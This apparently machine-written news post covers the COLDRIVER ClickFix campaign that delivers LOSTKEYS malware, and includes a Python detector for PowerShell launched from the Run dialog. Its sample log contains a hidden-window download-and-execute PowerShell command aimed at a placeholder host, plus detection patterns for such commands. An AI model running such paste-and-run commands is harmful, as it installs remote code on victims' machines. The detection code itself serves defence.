Ethical Hacking News
Russian hackers have been using a novel social engineering tactic called ClickFix as part of an espionage-focused campaign that deploys the LOSTKEYS malware. The activity has been attributed to COLDRIVER, a Russia-linked threat actor known for its involvement in various cyberespionage operations. Staying informed about such emerging tactics is part of staying protected from them.
Russian hackers are using a novel social engineering tactic called ClickFix as part of an espionage-focused campaign to deploy the LOSTKEYS malware. LOSTKEYS can steal files and send system information and a list of running processes to the attackers; it has been used against current and former government advisors, journalists, think tanks, and NGOs. ClickFix lures victims into opening a decoy website with a fake CAPTCHA prompt and then pasting a PowerShell command that the page has copied to the clipboard. The technique has gained popularity among threat actors in recent months and has been combined with EtherHiding to deliver macOS-based malware. A large-scale watering hole attack called MacReaper compromised 2,800 legitimate websites to serve fake CAPTCHA prompts. Threat actors are adopting ClickFix and EtherHiding to maximize infections and to avoid running inside analysis virtual machines.
According to Google's Threat Intelligence Group (GTIG), LOSTKEYS is capable of stealing files matching a hard-coded list of extensions and directories, as well as sending system information and a list of running processes to the attacker. The malware was observed in attacks on current and former advisors to Western governments and militaries, as well as journalists, think tanks, and NGOs.
LOSTKEYS marks the second custom malware attributed to COLDRIVER after SPICA, which was previously linked to credential phishing campaigns. The hacking group is also tracked under the names Callisto, Star Blizzard, and UNC4057.
In this latest campaign, victims are lured into opening a decoy website containing a fake CAPTCHA verification prompt. Upon completion of this step, the user is instructed to open the Windows Run dialog and paste a PowerShell command copied to the clipboard. This technique, known as ClickFix, has gained popularity among threat actors in recent months.
The next stage involves downloading and executing a third-stage payload from a remote server, which acts as a downloader for a more sophisticated malware payload. This downloader performs checks in an effort to evade execution in virtual machines before deploying LOSTKEYS on the compromised host.
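As an added example (not code from the article or from GTIG), the following Python snippet scores process-creation records for the ClickFix pattern described above: PowerShell spawned by explorer.exe, as happens when a pasted command is run from the Win+R dialog, with download-and-execute or window-hiding switches on the command line. The record field names are modelled on Sysmon Event ID 1 and the log lines, including the placeholder domain, are constructed for the demonstration.

```python
import json
import re
from typing import Iterable, List, Optional

# Case-insensitive patterns for command-line tokens typical of paste-and-run
# loaders: hide the window, bypass policy, fetch a payload, and execute it inline.
SUSPICIOUS_TOKENS = {
    "hidden_window": r"-w(?:indowstyle)?\s+hidden",
    "encoded_command": r"-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}",
    "download": r"\b(?:iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|downloadfile)\b",
    "inline_exec": r"\biex\b|invoke-expression",
    "policy_bypass": r"-(?:ep|exec|executionpolicy)\s+bypass",
}
POWERSHELL = re.compile(r"(?:^|\\)(?:powershell|pwsh)\.exe$", re.I)
# A command pasted into the Win+R Run dialog is spawned by the shell, explorer.exe.
RUN_DIALOG_PARENTS = {"explorer.exe"}


def analyze(event: dict) -> Optional[dict]:
    """Score one process-creation event; return None when nothing is suspicious."""
    if not POWERSHELL.search(event.get("Image", "")):
        return None
    parent = event.get("ParentImage", "").rsplit("\\", 1)[-1].lower()
    cmd = event.get("CommandLine", "")
    hits = [name for name, pat in SUSPICIOUS_TOKENS.items() if re.search(pat, cmd, re.I)]
    if not hits:
        return None
    # Weight the explorer.exe parent heavily: it is the ClickFix delivery path.
    score = len(hits) + (2 if parent in RUN_DIALOG_PARENTS else 0)
    return {"user": event.get("User"), "parent": parent, "indicators": hits, "score": score}


def scan(lines: Iterable[str]) -> List[dict]:
    """Parse JSON process-creation records and return findings, highest score first."""
    findings = [f for f in (analyze(json.loads(line)) for line in lines) if f]
    return sorted(findings, key=lambda f: f["score"], reverse=True)


# Constructed sample records (field names modelled on Sysmon Event ID 1; not real telemetry).
SAMPLE_LOG = [
    r'{"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "ParentImage": "C:\\Windows\\explorer.exe", "User": "CORP\\analyst", "CommandLine": "powershell -w hidden -ep bypass -c \"iex (irm https://captcha-check.invalid/verify)\""}',
    r'{"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "ParentImage": "C:\\Windows\\System32\\cmd.exe", "User": "CORP\\admin", "CommandLine": "powershell -File C:\\scripts\\backup.ps1"}',
    r'{"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "ParentImage": "C:\\Windows\\System32\\services.exe", "User": "NT AUTHORITY\\SYSTEM", "CommandLine": "powershell -enc SQBtAHAAbwByAHQALQBNAG8AZAB1AGwAZQA="}',
    r'{"Image": "C:\\Windows\\System32\\notepad.exe", "ParentImage": "C:\\Windows\\explorer.exe", "User": "CORP\\analyst", "CommandLine": "notepad.exe"}',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The explorer.exe parent alone is not malicious (users legitimately open PowerShell from the Run dialog), which is why the score combines it with the command-line indicators rather than alerting on the parent by itself.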
The GTIG further noted that the malware is only deployed selectively, indicating a high level of targeting within these attacks. Google uncovered additional LOSTKEYS artifacts going back to December 2023 that masqueraded as binaries related to the Maltego open-source investigation platform, although it remains unclear whether there are any ties between this malware and COLDRIVER.
The development comes amid growing concerns surrounding ClickFix's continued adoption by multiple threat actors. The tactic has been combined with another sneaky tactic called EtherHiding, which uses Binance's Smart Chain (BSC) contracts to conceal the next-stage payload, ultimately leading to the delivery of a macOS information stealer called Atomic Stealer.
Beyond the LOSTKEYS campaign, other threat actors have adopted ClickFix as part of their malware distribution strategies. For instance, attacks propagating a banking trojan called Lampion use phishing emails bearing ZIP file attachments as lures; the archive contains an HTML file that redirects the recipient to a fake landing page whose ClickFix instructions launch the multi-stage infection process.
That Lampion campaign targeted Portuguese-speaking individuals and organizations in various sectors, including government, finance, and transportation. In recent months, the ClickFix strategy has also been paired with EtherHiding to deliver macOS-based malware.
A large-scale watering hole attack codenamed MacReaper has compromised about 2,800 legitimate websites to serve fake CAPTCHA prompts. The attack leverages obfuscated JavaScript, three full-screen iframes, and blockchain-based command infrastructure to maximize infections.
The use of ClickFix and EtherHiding tactics highlights the evolving sophistication of cyber threats in recent months. As threat actors continue to adopt these strategies, it is essential for individuals and organizations to remain vigilant and take necessary precautions to protect themselves from such malicious campaigns.
Related Information:
https://www.ethicalhackingnews.com/articles/Russian-Hackers-Employ-ClickFix-Fueled-Social-Engineering-Tactics-to-Deploy-LOSTKEYS-Malware-ehn.shtml
https://thehackernews.com/2025/05/russian-hackers-using-clickfix-fake.html
https://cloud.google.com/blog/topics/threat-intelligence/coldriver-steal-documents-western-targets-ngos
https://cybersecuritynews.com/russian-coldriver-hackers-using-lostkeys-malware/
https://securityaffairs.com/58051/hacking/callisto-apt-hacking-team-tools.html
https://www.bleepingcomputer.com/news/security/uk-and-allies-expose-russian-fsb-hacking-group-sanction-members/
Published: Thu May 8 02:38:19 2025 by llama3.2 3B Q4_K_M